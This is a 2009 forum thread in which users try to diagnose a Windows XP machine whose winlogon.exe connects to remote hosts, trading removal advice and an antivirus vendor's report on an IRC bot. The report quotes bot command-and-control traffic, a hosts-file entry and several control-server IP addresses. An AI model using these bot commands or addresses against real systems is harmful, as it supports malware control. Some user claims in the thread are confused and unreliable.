DigeratiPrime Posted January 30, 2009 Posted January 30, 2009 If I had Mod rights in this forum I would've cleaned up your run on paragraph and possibly deleted some irrelevant information. You talk about your hard drives and partitions, then the software you used, then your wireless connection, then back to hard disks, then new claims of leakage in other windows services, then the WHIOS information which should be in a quote box or just linked to. All in one paragraph...How can you scan with 45 known and UNKNOWN programs.Installing all that security software would probably create problems.An SSID has nothing to do with passwords or keys.MFT has nothing to do with MBR.I get the sense you are ignoring our advice on how to remove this, and seem more interested in finding the source.Well you're probably wasting your time, those IP addresses are probably from a botnet using fast flux dns. Unfortunately I am not sure I want to feed you more lingo to abuse.
Kelsenellenelvian Posted January 30, 2009 Posted January 30, 2009 WOW from reading (and trying to decifer your paragraph) you seem to have little knowledge of all of the crud you are using.45 Known and unknown??? Alot of those "Anti-SPyware" apps are just the opposite.How to fix?#1 make yourself an Ultimate boot cd for Windows ON A DIFFERENT PC. Yes it is legal and free!#2 take your system offline and QUIT FEEDING the leeches!#3 run you UBCD4win and scan EVERYTHING!#4 reinstall windows ONLY (Leave the other danged OS'es alone untill you are secure)#5 install 1 anti-virus. Like ESET smart security (NOD32) or Kaspersky whatever, just not Nortons for the sake of the gods that be.#6 get a really good firewall!#7 Rescan everything from within windows.Now for gods sake after you get Windows reinstalled reorganize everything and surf safer!
cTreamer Posted January 30, 2009 Author Posted January 30, 2009 I wanted just to say that I've tried everything and with each Sotware that I have. They are nothing finding on all my Partitions F,G,H, but there is something that is manipulating my winlogon.exe. My Second PC-Notebook is also with Windows XP and there is also winlogon.exe in Memory doing only its job and nothing else.The idea with that W-Lan(War-Driving) was just from somebody from Police Central here in my City, but I've forgot it fast because it's not my case. I've took WinHex v15.1SR8 and looked up inside of all my Partitions.I saw files that are normally hiden from eyes. Master Boot Record,Master File Table,Log Files,Deleted Hiden Files and all this Forensic stuff you know.There was everything clean, none hiden Virus,Trojans,Rootkit,Worms&Co that could be hide here. So these are all things that could be Excluded as reason for mine winlogon.exe manipulation Problem.Actually there are more than 36.000 infected Networks and PC's in China all because a Conficker Worm. My winlogon.exe is exactly connection to this Region in the near of China. So maybe it's a not Conficker but other Parasite that scans whole day-night IP Adresses from users and when found some Windows Security Leakage try to connect its Sub-Services(DCom,RPCLocator) which are finally downloading the rest of Crap. I just don't understand why is this not happening with my Notebook which has also XP. So if somebody knows an Hotfix,Update,Patch against this is welcome. I know only about Conficker Patch and I've installed it allready. Maybe I am missing some Hotfixes on my System I don't know. Every help is welcome!!!Thanks for Admins&Mods for their Passion!!!GreetingscTreamer-Germany
DigeratiPrime Posted January 30, 2009 Posted January 30, 2009 I see that you are German, but are you making an effort to understand our posts? Please read what a rootkit is.http://en.wikipedia.org/wiki/Rootkithttp://de.wikipedia.org/wiki/RootkitPost a HiJackThis loghttp://www.trendsecure.com/portal/en-US/to...ckthis/downloadYou could check this location in the registry:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonC:\Windows\system32\userinit.exe,Also here is a screenshot from Sysinternals Process Explorer showing the Threads in my winlogon.exe process (Vista Ultimate SP1 x64)
cTreamer Posted January 31, 2009 Author Posted January 31, 2009 (edited) So first I am Armenian Citizen(Nationality) and not German OK. Both English and German are not my own mother Languages.So your language your roules anyway, cause there must be some solution for this Problem. Ok let's do all right way, so to understand what I am talking about this nerving winlogon.exe here is one Screenshot from AnVir Task Manager Pro. Below all Processes is another Section where can you see and investigate all that Details of some Program, inclusive TCP&UDP Connections+all details of it. Of sorrow I Can not represent you the winlogon.exe in action how is it downloading all that Crap, because I've it already blocked with Anti Rootkit Tool GMER v1.1 so it is no more connecting in TCP&UDP Register. Here is it:http://i39.tinypic.com/10o3bpk.jpghttp://i42.tinypic.com/a4psa0.jpghttp://i42.tinypic.com/10hktwm.jpgIn Task Manager blue marked line(hope you can see) with cursor is my winlogon.exe Service OK !GreetingscTreamer System: nLite Win XP Pro+SP3+ALL Addons-Updates from Sereby-DynaletikRouter:D-Link DSL 2741B W-Lan 300 Mbits Hardware FirewallIf you need some more Screenshots just say OK. Thank you !cTreamer Edited February 4, 2009 by Tarun
DigeratiPrime Posted February 1, 2009 Posted February 1, 2009 FYI: When you save screenshots use PNG format since it's lossless. Also you can use alt+printscreen to capture just the active window.FYI: Wtih Process Explorer you can increase the Difference Highlighting Duration so you have more time to analyze and take a screenshot.If you want to have a known clean computer you should format your system partition and reinstall windows. You could do a repair install or replace individual files with the recovery console but that will take more time and might not work.
cTreamer Posted February 2, 2009 Author Posted February 2, 2009 I have already done like this. First with Special Software LSoft Bootdisc v3.0 overwriten the C:\ Partition(DoD Method,Peter Gutman,Zeros) and more than once. After that controlled with Hex Editor is there nothing has survived, when saw only Zeros on C:\ complete free spaces again.So than I install Windows XP maden with nLite. I done this over 1000 times from November 2008 untill now it is not helping. I know only one thing, since I am trying to SlipStream SP3 into XP I've got this problems. I don't know what should I do more. Should I write some Email directly to Microsoft here in Germany, what do you think could Microsoft help me???GreetingscTreamer
Glaukus Posted February 3, 2009 Posted February 3, 2009 HiI have singed up on this site to share my experience with this same exact problem in the last 48 hours.I have the same exact symptoms. Winlogon.exe is reaching out to the same IP and more malware are eventually loaded. The original offender is currently undetectable.I managed to find out how I was getting infected. It turns out an exe file is being loaded automatically via a script that I have. The original exe, which is present in a network share, was modified “somehow” in the last few days. Once this exe runs, Winlongon.exe starts to connect to the IP automatically and the rest of the malware follows.The file has been submitted to the AV company but after 2 days they haven't been successful in deconstructing the virus.Once I know more about the behavior I will try to post here.Good luck
cTreamer Posted February 3, 2009 Author Posted February 3, 2009 Oh finally somebody that believes to me cause most people are thinking I am crazy or so. Thats for is Great what you wrote now I understand how is it working.We both must just find out where is this Script+virus.exe that is Reverse Engineering Original winlogon.exe.So I am waiting for your Results from AV Company. Further gonna stay in Good contact with you.GreetingscTreamerWish you Good Luck To !!!
Glaukus Posted February 4, 2009 Posted February 4, 2009 (edited) Here is the latest from the AV company------------------------This malware connects to IRC channel.Connection information:NICK gvhmdwhuUSER z020501 . . :#074711ecc JOIN #.364:u. PRIVMSG jepabvnu :!get REMOVED URL:i.PONG :i. PING :i.PONG :i. PING :i.PONG :i. PING :i.PONG :i. PING :i.PONG :i. PING :i.PONG :i. PING :i.PONG :i. PING :i. Downloads this particular file REMOVED URL which is detected as (Generic Downloader.x). It adds an entry into the host file (127.0.0.1 ZieF.pl).It opens a port on the infected machine and waits for command on IRC channel. It also infects .exe files.Network activity:Connects to various IP's1. 58.65.232.342. 211.95.79.63. 218.93.202.1144. 61.235.117.81---------------------------------------It is worth blocking the IP or rather putting fake DNS entries for all those connections. For us we found the source EXE so we have removed it. The infected workstations slowly are getting reimaged.One more note. The AV company after full 48 hours is still fighting for a solution. This is not yet wide spread workwide based on what they tell me. In my view it cannot be cleaned. It comprimises too many OS files.Crazy stuff.....Once you identify the source just remove that and proceed with the reimaging of your PC's. Also dont forget that if this thing stays live for long it may change behaviour since it probably can autoupdate.Good luck Edited February 4, 2009 by Tarun Removed malicious url
cTreamer Posted February 4, 2009 Author Posted February 4, 2009 (edited) You look my Hosts File Entry: Copyright © 1993-1999 Microsoft Corp.## Dies ist eine HOSTS-Beispieldatei, die von Microsoft TCP/IP# für Windows 2000 verwendet wird.## Diese Datei enthält die Zuordnungen der IP-Adressen zu Hostnamen.# Jeder Eintrag muss in einer eigenen Zeile stehen. Die IP-# Adresse sollte in der ersten Spalte gefolgt vom zugehörigen# Hostnamen stehen.# Die IP-Adresse und der Hostname müssen durch mindestens ein# Leerzeichen getrennt sein.## Zusätzliche Kommentare (so wie in dieser Datei) können in# einzelnen Zeilen oder hinter dem Computernamen eingefügt werden,# aber müssen mit dem Zeichen '#' eingegeben werden.## Zum Beispiel:## 102.54.94.97 rhino.acme.com # Quellserver# 38.25.63.10 x.acme.com # x-Clienthost127.0.0.1 localhostDo you mean this file Located in C:\Windows\System32\Drivers\etc\hosts ??? I don't see (127.0.0.1 ZieF.pl) entry.So I must now found only that 0032.exe or 0032.exePING?. I've got 3 File Partitions F,G,H. I am going to try first with Windows Search what do you think can Windows Search find this 0032.exe file or should I try what else. One thing that I don't understand is what has this Consulting Service Small Company in Poland to do with this. Cause Domain is:Host: ircd.zief.plPort: 80and owner of this ircd.zief.pl is:DOMAIN: zief.plregistrant's handle: sibr62259 (INDIVIDUAL)nameservers: dns1.zief.pl. [58.65.232.33] dns2.zief.pl. [58.65.232.34]created: 2005.07.25 15:58:55last modified: 2008.09.25 10:49:06no optionREGISTRAR: Consulting Service "Exactly This Company"ul. Domaniewska 35A lok.1B02-672 WarszawaPolska/Poland+48.22 8538888domeny@ConsultingService.plWHOIS displays data with a delay not exceeding 15 minutes in relation to the .pl Registry systemRegistrant data available at http://dns.pl/cgi-bin/en_whois.pl_____NeoTrace Copyright ©1997-2001 NeoWorx IncIt's really Crazy thing that Redirects to Chinese IP Ranges but Domain-Host is in Poland very Difficult to understand this Cascading-IP Masquerading Mechanisms to hide theirs Traces and Sources. GreetingscTreamer Edited February 5, 2009 by cTreamer
Glaukus Posted February 4, 2009 Posted February 4, 2009 I am just giving you the info I have about my caseDid you run Prevx CSI against your PC?Mcafee will provide a stinger utility soon. I will post once I more info
cTreamer Posted February 4, 2009 Author Posted February 4, 2009 (edited) No I've only Prevx EDGE Free Edition tried. It's finding nothing you know. So I've downloaded Prevx CSI Free Edition and it is scanning now. No Prevx CSI has found nothing on my Windows C:\ . Still no Results I think it gonna take some Weeks before I find out where it is hidden on my System. I need some strong Tool that scans also mine other 3 Partitions and not just only C:\ you know. With this Prevx CSI Free Edition can be only scanned C:\ and not other Partitions. Where is in your Computer-Partition hidden this file have you already find out ???, because I think it is not on C: somewhere else in other Partition in Files like Rar,Zip,Setups,Msi,CAB,EXE,DLL,SYS,INI,INF or so.At searching in Google I've found one very usefull site: http://mtc.sri.com/ they are Treating of all kind such difficult to find stuff. What is Interesting that I have found exactly same Report as yours you know. Here is one Screenshot from http://mtc.sri.com/ : Edited February 5, 2009 by cTreamer
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now